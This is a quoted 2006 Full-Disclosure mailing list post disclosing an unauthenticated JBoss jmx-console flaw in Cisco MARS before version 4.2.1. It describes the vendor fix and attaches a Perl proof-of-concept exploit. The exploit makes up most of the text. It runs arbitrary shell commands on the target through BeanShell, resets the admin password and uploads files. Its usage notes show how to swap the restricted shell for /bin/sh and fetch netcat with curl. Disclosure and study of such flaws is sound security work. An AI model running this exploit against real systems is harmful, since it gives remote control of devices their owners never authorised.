> ------------------------------
>
> Message: 7
> Date: Wed, 19 Jul 2006 09:17:09 -0700
> From: Jon Hart <jhart@xxxxxxxxxxx>
> Subject: [Full-disclosure] Cisco MARS < 4.2.1 remote compromise
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Message-ID: <20060719161709.GF25856@xxxxxxxxxxx>
> Content-Type: text/plain; charset="us-ascii"
>
> Cisco MARS (Monitoring, Analysis and Response System,
> sometimes referred
> to as CS-MARS) prior to version 4.2.1 ships with an unprotected JBoss
> installation which ultimately leads to a complete compromise of the
> device.
>
> The caveat here is that, despite much work on Cisco's part, they were
> not able to determine why some CS-MARS boxes were vulnerable
> and others
> were not. In versions 4.2.1 and newer, the discovered vulnerabilities
> have been fixed.
>
> Vulnerability #1
> ----------------
>
> CS-MARS shipped with JBoss 3.2.7, which suffered a number of flaws
> originally disclosed by Marc Schoenefeld in June of 2005. See
> for the
> original posting.
>
> Vulnerability #2
> ----------------
>
> CS-MARS' JBoss installation is basically stock, so few if any of the
> recommended procedures were taken to secure it prior to shipment.
> A common document used in securing JBoss can be found at
>
>
> Perhaps the most glaring vulnerability that results is the exposure of
> the jmx-console, and in turn full access to all of the MBeans. Per
> JBoss.org's description of the jmx-console:
>
> "The JMX console provides a raw view into the microkernel of the
> JBoss application server. It lists all registered services (MBeans)
> that are active in the application server and that can be accessed
> either through the JMX console itself or programmatically from Java
> code."
>
> As you can imagine, once an attacker has access to the
> jmx-console, the
> thoroughness with which the box can be compromised is only limited by
> their imagination. The jmx console is reachable on CS-MARS devices
> versions < 4.2.1 -- no authentication is necessary, and is
> available on
> port 80 and 443.
>
> I've put together some functional POC exploit code that leverages many
> of the MBeans to compromise the system in various ways.
> Please see the
> attached code.
>
>
> Vendor status
> -------------
>
> Cisco's PSIRT was extremely responsive throughout this entire process.
> The JBoss issues I mentioned above are addressed by Cisco DDTS
> CSCse47646, and fixed in version 4.2.1 and newer.
>
>
> Enjoy,
>
> -jon
>
> -------------- next part --------------
> #!/usr/bin/perl
> #
> # Cisco/Protego CS-MARS < 4.2.1 remote command execution,
> system compromise
> # via insecure JBoss installation.
> #
> # Fully functional POC code by Jon Hart <jhart@xxxxxxxxxxx>
> #
> # Addressed in CSCse47646
> #
> # CS-MARS is an event correlation product orginally written
> by Protego,
> # which is now owned by Cisco. It is built on top of JBoss.
> # Unfortunately, little or no effort was put in to securing the JBoss
> # installation as per the JBoss community's recommended best
> practices.
> # A such, the usual set of JBoss interfaces are wide open and
> it is up to
> # the attacker how creative they want to be in compromising
> the box. This
> # particular exploit vector abuses the JBoss jmx-console for
> all sorts of
> # fun. It should also be noted that, because of the very old kernel
> # running on most CS-MARS boxes (2.4.9), once JBoss is
> compromised, root is
> # almost trivial. Thanks to Cisco PSIRT and Matt Cerha for their
> # cooperation in getting this fixed.
> #
> #################################
> # Copyright (C) 2006 Jon Hart
> #
> # This program is free software; you can redistribute it
> and/or modify it
> # under the terms of the GNU General Public License as
> published by the Free
> # Software Foundation; either version 2 of the License, or
> (at your option)
> # any later version.
> #
> # This program is distributed in the hope that it will be
> useful, but WITHOUT
> # ANY WARRANTY; without even the implied warranty of
> MERCHANTABILITY or
> # FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
> Public License for
> # more details.
> #
> # You should have received a copy of the GNU General Public
> License along with
> # this program; if not, write to the Free Software
> Foundation, Inc., 59 Temple
> # Place, Suite 330, Boston, MA 02111-1307 USA
> #
> #
> #################################
> #
>
> use strict;
> use HTTP::Request::Common;
> use LWP::UserAgent;
> use IO::Socket;
>
> my $target = shift(@ARGV) || &usage;
> my $attack_type = shift(@ARGV) || &usage;
>
> for ($attack_type) {
> if (/pass/) { &change_passwd(@ARGV); }
> elsif (/cmd/) { &run_cmd(@ARGV); }
> elsif (/upload/) { &upload(@ARGV); }
> elsif (/[bean|bsh]/) { &run_bsh(@ARGV); }
> else { &usage; }
> }
>
> sub change_passwd {
> my $passwd = shift;
> &run_cmd("/opt/janus/release/bin/pnpasswd $passwd");
> }
>
> sub encode {
> my $en = shift;
> my $string = "";
> foreach my $char (split(//, $en)) {
> if ($char =~ /([:|\/|(|)|"|'|`| ])/) {
> $string .= sprintf("%%%x", ord($1));
> } else { $string .= $char; }
> }
> return $string;
> }
>
> sub jmx_post {
> my $form_data = shift;
> my $ua = LWP::UserAgent->new;
> $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
> my $req = HTTP::Request->new(POST =>
> ";);
> $req->content_type('application/x-www-form-urlencoded');
> $req->content(&encode($form_data));
>
> my $res = $ua->request($req);
>
> return $res->is_success ? 0 : $res->status_line;
> }
>
> sub run_bsh {
> my $file = shift;
> my $bsh = "";
> open(BSH, "$file") or die "Couldn't open $file: $!\n";
> print("Sending beanshell from $file: ");
> while (<BSH>) {
> # the bsh must be one long string...
> chomp();
> $bsh .= $_;
> }
>
> printf("%s\n", &send_beanshell($bsh) == 0 ? "Success" : "Failed");
> }
>
> sub run_cmd {
> my $cmd = shift;
> my $code = "";
>
> # & in the command needs to be encoded so as to not be
> confused with the &
> # in the URI
> $cmd =~ s/&/%26/g;
> if ($cmd =~ />|\||&/) {
> # exec() does not handle pipes or redirection well, so
> do this instead
> $code = 'String sh = "/bin/sh"; String opt = "-c";
> String cmd = "'
> . $cmd .
> '"; String[] exec = new String[] { sh, opt, cmd
> }; Runtime.getRuntime().exec(exec);';
> } else {
> $code = "Runtime.getRuntime().exec(\"$cmd\");";
> }
>
> print("Running '$cmd' on $target: ");
> printf("%s\n", &send_beanshell($code) == 0 ? "Success" :
> "Failed!");
> }
>
> sub send_beanshell {
> my $code = shift;
> # ensure the name of the bsh job within java has a unique name
> my $name = "cmd" . int(rand(65535)) . $$;
> return
> &jmx_post("action=invokeOp&name=jboss.scripts:service=BSHDeplo
> yer&methodIndex=1&arg0=$code&arg1=$name");
> }
>
> sub upload {
> # upload a file. I was too lazy to use
> org.jboss.console.manager.DeploymentFileRepository
> my $file = shift;
> my $path = shift;
> my $new_name = shift;
> my $chunk = "";
> my $ret = 0;
> open(FILE, "< $file") or die "Couldn't open $file for
> reading: $!\n";
>
> if (!(defined($new_name))) {
> my @path = split(/\//, $file);
> $new_name = $path[$#path];
> }
>
> print("Uploading $file to $target...\n");
> &run_cmd("touch $path/$new_name");
> while(read(FILE,$chunk,4096)) {
> # encode this file in 4096 byte chunks in a format that
> is able to be handled by JBoss.
> # There are plenty of ways to do this, but none that
> were both portable and that didn't make JBoss
> # throw a 500 or otherwise botch the file. UGLY.
> $chunk = join('', map { sprintf("%03d,", ord("$_")) }
> split(//, $chunk));
> $ret += &run_cmd("echo -n $chunk | perl -ne 'foreach
> (split(/,/, \$_)) { print chr(\$_); }' >> $path/$new_name");
> }
>
> printf("Upload of $file to $target:$path/new_name %s!\n",
> $ret == 0 ? "succeeded" : "failed");
> }
>
>
> sub usage {
> print <<EOF;
> Cisco MARS (CS-MARS) < 4.2.1 JBoss exploit (CSCse47646)
> POC by Jon Hart <jhart\@spoofed.org>
>
> Basic Usage:
> $0 <target> <exploit_type> [<exploit_specific_args] ...]
>
> Extended Usage:
> Change password:
> $0 <target> pass <password>
> Run shell command:
> $0 <target> cmd <your quoted shell command>
> Run BeanShell code:
> $0 <target> bsh /path/to/file/with/beanshell
> Upload files:
> $0 <target> upload <file to upload> <path on target>
> [<new name>]
>
> Fun Stuff:
> Get a real shell:
> $0 <target> cmd "cp /opt/janus/release/bin/pnsh
> /opt/janus/release/bin/pnsh.bak"
> $0 <target> cmd "rm /opt/janus/release/bin/pnsh"
> $0 <target> cmd "cp /bin/sh /opt/janus/release/bin/pnsh"
> # now ssh to the target...
> [pnadmin\@pnmars bin]\$ id
> uid=501(pnadmin) gid=501(pnadmin) groups=501(pnadmin)
> [pnadmin\@pnmars bin]\$ uname -a
> Linux pnmars 2.4.9-e.57 #1 Thu Dec 2 20:56:19 EST
> 2004 i686 unknown
> [pnadmin\@pnmars bin]\$ hostname
> pnmars
>
> Download something:
> $0 <target> cmd "curl -o /tmp/nc"
>
> EOF
> exit(1);
> }
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: not available
> Type: application/pgp-signature
> Size: 189 bytes
> Desc: Digital signature
> Url :
>
> /20060719/6a267bb9/attachment-0001.bin
>
